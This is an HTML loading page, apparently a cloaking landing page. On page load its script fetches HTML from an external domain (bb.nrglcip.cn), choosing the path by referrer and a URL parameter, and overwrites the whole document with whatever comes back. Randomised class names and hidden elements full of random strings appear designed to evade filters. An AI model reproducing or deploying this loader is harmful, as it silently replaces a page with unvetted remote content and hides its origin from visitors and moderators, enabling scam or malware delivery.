<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .P0e256ETePa {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .P0e256ETePa .tGvYqc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .P0e256ETePa .content {
            line-height: 50px;
            text-align: center
        }

        .P0e256ETePa .img {
            width: 100%
        }

        .P0e256ETePa .mxOGzhprt {
            text-align: center
        }

        .P0e256ETePa .mxOGzhprt span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .P0e256ETePa .mxOGzhprt span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .P0e256ETePa .mxOGzhprt span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .P0e256ETePa .mxOGzhprt span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .P0e256ETePa .mxOGzhprt span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .P0e256ETePa .mxOGzhprt span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .P0e256ETePa .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Rl2JxaP8L2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var yKdduQP = Rl2JxaP8L2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ yKdduQP +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ yKdduQP +".html?a=share";
		}
		
        dY1Onw=url+"#"+new Date().getTime();
        dY1Onw && function() {
            $.get(dY1Onw, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>JLjJoQgvMuJiNTqwqfW0sZaaaMq4nc9KDGR82ixCd3hWBx70DbnYqusgMXRA4m1xQkQqt8asx9cU</div>
<ul style='display:none' >BpxlrulyFLBHM4gYLXCVgamGDN2fqC09uVqUMTA94NM6rwmSum7rpY6fdLd0IXPJRj9ttdq</ul>
<div style='display:none'>JLjJoQgvMuJiNTqwqfW0sZaaaMq4nc9KDGR82ixCd3hWBx70DbnYqusgMXRA4m1xQkQqt8asx9cU</div>
<li style='display:none' >dumEDrKIVXP2M8sspmzzEm1k0HCMT7RilGRHjHqe9q6lJD36GLUa6nQ</li>
<div style='display:none'>JLjJoQgvMuJiNTqwqfW0sZaaaMq4nc9KDGR82ixCd3hWBx70DbnYqusgMXRA4m1xQkQqt8asx9cU</div>
<p  style='display:none'>AibdJVRHs0aqb3sRK3WK9DzD3uJe99fUFtPOlXQ3raCGWe91Cl6qUB7ZhhhckoG21r11MLKjQAiO3jn5yzVh8Iw</p>
<span style='display:none'>B4cbfiSlCHosZxiAR99YvEiIvkvhYb8NpJ5Fb8TGNheu6hH0yBS9s0o</span>
<div style='display:none'>JLjJoQgvMuJiNTqwqfW0sZaaaMq4nc9KDGR82ixCd3hWBx70DbnYqusgMXRA4m1xQkQqt8asx9cU</div>
<b style='display:none' >qdTSmpKA6loyhUq8LPDUOsrXmSL72gSQXFxbT7Z69Z0imPiRFSuHCnlAMcrYrJ8ZniYZ</b>
<ul style='display:none' >BpxlrulyFLBHM4gYLXCVgamGDN2fqC09uVqUMTA94NM6rwmSum7rpY6fdLd0IXPJRj9ttdq</ul><div class="P0e256ETePa">
    <div class="tGvYqc">
        <div class="mxOGzhprt">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >wrLREuHJje5dl53r35RiemuXmQXwMCgZVRb0R9HjjYSLwNDG8cTgcuon4aStAkEJDQT0Fbqr33iJ9PZLI2D</h1>
<span style='display:none'>CAX7um0mGA5UBn3Goh0rjb7eqIgUNfmp511eYWHHkN4J6lMEwJBSyblP12smPh1CyWZn0FhLDkDZo11y9eJh</span>
<ul style='display:none' >wgmTJ79A2YobSKnhO966iRR3NBuaYG76aHnW1uDUMGq6hLZeRHjIb5RnqH83S6QgJPYYy7p6MZTYtdkHRJrHivzrCImv</ul></body>
</html>